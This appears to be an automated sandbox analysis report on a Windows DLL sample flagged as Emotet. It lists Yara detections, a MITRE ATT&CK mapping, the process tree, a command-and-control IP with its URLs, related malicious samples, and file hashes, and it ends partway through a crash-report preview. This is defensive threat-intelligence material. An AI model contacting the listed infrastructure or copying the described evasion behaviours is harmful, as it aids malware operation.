                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE8A584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE8A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.19.dr Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.19.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 0000000C.00000002.761941532.000002922263E000.00000004.00000001.sdmp Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.762220648.0000029222702000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 25.2.rundll32.exe.2960000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.33d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.2a521e0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.2a521e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.35f21e8.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.35624d0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.35624d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.33e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.33d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.33e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.2963508.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 25.2.rundll32.exe.2960000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.35f21e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.1523618.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.14d0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.2963508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.592715201.000000000354A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.471143849.000000000294A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.492232954.0000000002A3A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.494249926.00000000035DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, type: MEMORY

                      MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | DLL Side-Loading1 | Process Injection112 | Masquerading2 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Security Software Discovery61 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories1 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information2 | DCSync | File and Directory Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll321 | Proc Filesystem | System Information Discovery34 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | File Deletion1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

Behavior Graph

Behavior Graph ID: 532438, Sample: 3pO1282Kpx, Start date: 02/12/2021, Architecture: WINDOWS, Score: 96 (graph image not reproduced; the process tree below is recovered from the graph's text)

Top-level signatures: Sigma detected: Emotet RunDLL32 Process Creation; Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Yara detected Emotet

Process tree:

• loaddll32.exe
  • rundll32.exe (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
    • rundll32.exe
      • rundll32.exe, connects to 45.63.5.129:443 from port 49804, AS-CHOOPAUS, United States (signature: System process connects to network (likely due to code injection or exploit))
  • cmd.exe
    • rundll32.exe
      • rundll32.exe
  • rundll32.exe
    • rundll32.exe
  • 3 other processes
    • rundll32.exe
• svchost.exe (signature: Changes security center settings (notifications, updates, antivirus, firewall))
  • MpCmdRun.exe
    • conhost.exe
• svchost.exe
  • WerFault.exe
  • WerFault.exe
• 10 other processes, contacting 127.0.0.1

Screenshots

(screenshot thumbnails not reproduced)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
3pO1282Kpx.dll | 23% | Virustotal |
3pO1282Kpx.dll | 18% | ReversingLabs | Win32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
14.2.rundll32.exe.33d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
25.2.rundll32.exe.2960000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.700000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
5.2.rundll32.exe.33e0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
4.2.rundll32.exe.6d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.14d0000.6.unpack | 100% | Avira | HEUR/AGEN.1110387
2.2.rundll32.exe.520000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.14d0000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.14d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.2.loaddll32.exe.14d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.14d0000.9.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNb | 0% | Avira URL Cloud | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNG | 0% | Avira URL Cloud | safe
https://45.63.5.129/ | 8% | Virustotal |
https://45.63.5.129/ | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNOz | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN | 0% | Avira URL Cloud | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/ | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries


                                                                                                      Contacted IPs


                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.63.5.129 | unknown | United States | 20473 | AS-CHOOPAUS | true

                                                                                                      Private

                                                                                                      IP
                                                                                                      127.0.0.1

                                                                                                      General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532438
Start date: 02.12.2021
Start time: 09:32:22
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 7s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 3pO1282Kpx (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@46/21@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.4% (good quality ratio 21.9%)
• Quality average: 70.2%
• Quality standard deviation: 26.3%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                      Warnings:
• Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 23.35.236.56, 20.189.173.22, 20.54.110.249
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
09:33:30  API Interceptor  10x Sleep call for process: svchost.exe modified
09:35:41  API Interceptor  1x Sleep call for process: WerFault.exe modified
09:36:04  API Interceptor  1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match        Associated Sample Name / URL  SHA 256   Detection  Link    Context
45.63.5.129  nhlHEF5IVY.dll                Get hash  malicious  Browse
             IGidwJjoUs.dll                Get hash  malicious  Browse
             efELSMI5R4.dll                Get hash  malicious  Browse

Domains

No context

ASN

Match        Associated Sample Name / URL                        SHA 256   Detection  Link    Context
AS-CHOOPAUS  nhlHEF5IVY.dll                                      Get hash  malicious  Browse  45.63.5.129
             IGidwJjoUs.dll                                      Get hash  malicious  Browse  45.63.5.129
             efELSMI5R4.dll                                      Get hash  malicious  Browse  45.63.5.129
             ImSL42AOtZ.exe                                      Get hash  malicious  Browse  45.63.36.79
             spZRMihlrkFGqYq1f.dll                               Get hash  malicious  Browse  66.42.57.149
             spZRMihlrkFGqYq1f.dll                               Get hash  malicious  Browse  66.42.57.149
             iU17wh2uUd.exe                                      Get hash  malicious  Browse  149.28.253.196
             iU17wh2uUd.exe                                      Get hash  malicious  Browse  149.28.253.196
             Sz4lxTmH7r.exe                                      Get hash  malicious  Browse  149.28.253.196
             7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe   Get hash  malicious  Browse  149.28.253.196
             RFIlSRQKzj.exe                                      Get hash  malicious  Browse  45.32.115.235
             setup_x86_x64_install.exe                           Get hash  malicious  Browse  149.28.253.196
             991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe   Get hash  malicious  Browse  149.28.253.196
             MMUc2aeWxZ.exe                                      Get hash  malicious  Browse  149.28.253.196
             0pvsj0MF1D.exe                                      Get hash  malicious  Browse  149.28.253.196
             Linux_amd64                                         Get hash  malicious  Browse  45.32.162.141
             nkXzJnW7AH.exe                                      Get hash  malicious  Browse  149.28.253.196
             67MPsax8fd.exe                                      Get hash  malicious  Browse  136.244.117.138
             Linux_x86                                           Get hash  malicious  Browse  45.77.44.252
             uI6mJo4TJQ.exe                                      Get hash  malicious  Browse  149.28.253.196

JA3 Fingerprints

Match                             Associated Sample Name / URL  SHA 256   Detection  Link    Context
51c64c77e60f3980eea90869b68c58a8  nhlHEF5IVY.dll                Get hash  malicious  Browse  45.63.5.129
                                  IGidwJjoUs.dll                Get hash  malicious  Browse  45.63.5.129
                                  efELSMI5R4.dll                Get hash  malicious  Browse  45.63.5.129
                                  TYLNb8VvnmYA.dll              Get hash  malicious  Browse  45.63.5.129
                                  2gyA5uNl6VPQUA.dll            Get hash  malicious  Browse  45.63.5.129
                                  spZRMihlrkFGqYq1f.dll         Get hash  malicious  Browse  45.63.5.129
                                  spZRMihlrkFGqYq1f.dll         Get hash  malicious  Browse  45.63.5.129
                                  fehiVK2JSx.dll                Get hash  malicious  Browse  45.63.5.129
                                  kQ9HU0gKVH.exe                Get hash  malicious  Browse  45.63.5.129
                                  gvtdsqavfej.dll               Get hash  malicious  Browse  45.63.5.129
                                  mhOX6jll6x.dll                Get hash  malicious  Browse  45.63.5.129
                                  dguQYT8p8j.dll                Get hash  malicious  Browse  45.63.5.129
                                  jSxIzXfwc7.dll                Get hash  malicious  Browse  45.63.5.129
                                  mhOX6jll6x.dll                Get hash  malicious  Browse  45.63.5.129
                                  X2XCewI2Yy.dll                Get hash  malicious  Browse  45.63.5.129
                                  dguQYT8p8j.dll                Get hash  malicious  Browse  45.63.5.129
                                  date1%3fBNLv65=pAAS.dll       Get hash  malicious  Browse  45.63.5.129
                                  HMvjzUYq2h.dll                Get hash  malicious  Browse  45.63.5.129
                                  s9BZBDWmi4.dll                Get hash  malicious  Browse  45.63.5.129
                                  bFx5bZRC6P.dll                Get hash  malicious  Browse  45.63.5.129

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.3593198815979092
Encrypted: false
SSDEEP: 12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5: BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1: C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256: BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512: 00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious: false
C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.24942566786740486
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4k:BJiRdwfu2SRU4k
MD5: F78E70A1621F2D5C73A7D5A9F1114557
SHA1: 02444FDD416593D5609ED34E781BD80BBABADB17
SHA-256: B0247AA90FBD07D35C07CD761E4CE4D6E981DE9252E45430CCC8926E10978F45
SHA-512: B4CA883A2E0C299C574335BD385744FFE109E8E270194E316D3CB968DE5FF009A4DB4479DECE14FB467CE31AB4BA1BEEA4F77CB3EDD5BFF47F321351DB651797
Malicious: false
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xaa8f4eab, page size 16384, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.25060064220021383
Encrypted: false
SSDEEP: 384:HESE3+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:HESE8SB2nSB2RSjlK/+mLesOj1J2
MD5: 3131682BBEA03E9062431DF4D4A37425
SHA1: F142C57DE3CE14B3CD740156499470EA607A54EA
SHA-256: FB91C9E4763A52EBD86C30EFED3D88B118CB129C817008A131A46D8674C79312
SHA-512: 121D4A1FC467A98BCD4EADA96DE61A91E6FD0D4813F9116E9A551F6EE269C844CA4CA515BE79D53CE580AE0F482FC6475AA5DAFB1FF752D94DDE3BE68FB705EE
Malicious: false
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07430065591163745
Encrypted: false
SSDEEP: 3:aXJ7v7wuRkpDYEDge3lTpyyll3Vkttlmlnl:aXJrLMV3
MD5: 8978474C3FAEE60FE67EC9A3CEECB56B
SHA1: 08DBA96654DF218266F5E94B0F5B218A44880191
SHA-256: DF10EF51ADAA2ECFECA26DA8F0C537592DFFD066AC204167AE7ABA4C370A1D2A
SHA-512: FB3520CB49477C38686F994CAA110B79AF19F079590B460DB392B1228A75E5725F375C8A2CB63B490D292DF32B948400E77C959B713361B160EE2088973CE272
Malicious: false
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_747b3d3843a661accc8c92924ccfd5a2e2d128_d70d8aa6_10c8bd69\Report.wer
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.6749421180832825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:PCdstZqyay9hkoyt7JfqpXIQcQ5c6A2cE2cw33+a+z+HbHgkVG4rmMOyWZAXGngP:6eBDHnM28jjoq/u7sVS274ItW
                                                                                                            MD5:3A3ED2564A039109118313347F1708C4
                                                                                                            SHA1:F6DDCC7CAC4CA49BA35D04F47513C87A41C912D4
                                                                                                            SHA-256:70C976E3B6692CFC41EB7E7465231DF682098510B8CED3F6BABAD57322934D90
                                                                                                            SHA-512:82110461E1AB100899944DC61A276806949C132DB87513C982E74B67E1856B63A6127D1023586DE970918576A507C9016E59BDD293C432CD1C99F10ECAA3A5BE
                                                                                                            Malicious:false
                                                                                                             Preview: Version=1
                                                                                                                      EventType=APPCRASH
                                                                                                                      EventTime=132829401220935027
                                                                                                                      ReportType=2
                                                                                                                      Consent=1
                                                                                                                      ReportIdentifier=e983e484-9ec4-4c15-9f3f-12acf6740e43
                                                                                                                      IntegratorReportIdentifier=08f5fa9d-8a86-4699-852d-150f5c0ecd65
                                                                                                                      Wow64Host=34404
                                                                                                                      Wow64Guest=332
                                                                                                                      NsAppName=loaddll32.exe
                                                                                                                      AppSessionGuid=00000a38-0001-0016-c11d-8eb0a2e7d701
                                                                                                                      TargetAppId=W:0000da39a3ee5e6b4b0d3255bfef95601890afd80709!0000da39a3ee5e6b4b0d3255bfef95601890afd80709!loaddll32.exe
                                                                                                                      TargetAppVer=2021//09//28:11:53:05!0!loaddll32.exe
                                                                                                                      BootId=4294
